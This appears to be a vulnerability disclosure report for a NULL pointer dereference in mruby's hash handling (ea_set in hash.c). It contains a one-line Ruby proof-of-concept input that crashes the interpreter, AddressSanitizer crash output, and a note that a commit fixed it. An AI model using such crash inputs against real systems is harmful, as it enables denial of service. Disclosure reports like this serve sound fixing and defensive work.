NULL Pointer Dereference in mruby/mruby
Valid
Reported on
Sep 24th 2021
Description
NULL Pointer Dereference on ea_set
Proof of Concept
// poc.rb
[ ** ...1, From: +- ~2]
Result
mruby/bin/mruby poc.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28787==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x55b05da25a1a bp 0x7fffa04443e0 sp 0x7fffa04443c0 T0)
==28787==The signal is caused by a WRITE memory access.
==28787==Hint: address points to the zero page.
#0 0x55b05da25a19 in ea_set /home/zx/asanmruby/src/hash.c:463
#1 0x55b05da261df in ar_set /home/zx/asanmruby/src/hash.c:540
#2 0x55b05da296f1 in h_set /home/zx/asanmruby/src/hash.c:1004
#3 0x55b05da2aa4c in mrb_hash_set /home/zx/asanmruby/src/hash.c:1246
#4 0x55b05da63f11 in mrb_vm_exec /home/zx/asanmruby/src/vm.c:2692
#5 0x55b05da42182 in mrb_vm_run /home/zx/asanmruby/src/vm.c:1032
#6 0x55b05da8345c in mrb_top_run /home/zx/asanmruby/src/vm.c:2969
#7 0x55b05daafdef in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6896
#8 0x55b05dab00dd in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
#9 0x55b05d9ae092 in main /home/zx/asanmruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#10 0x7f3a69d830b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#11 0x55b05d9ab42d in _start (/home/zx/asanmruby/bin/mruby+0xbd42d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/zx/asanmruby/src/hash.c:463 in ea_set
==28787==ABORTING
``
We have contacted a member of the
mruby
team and are waiting to hear back
2 years ago
Fixed by c70159b3562e09a37577b4c6913de3ec7b8f06b4
to join this conversation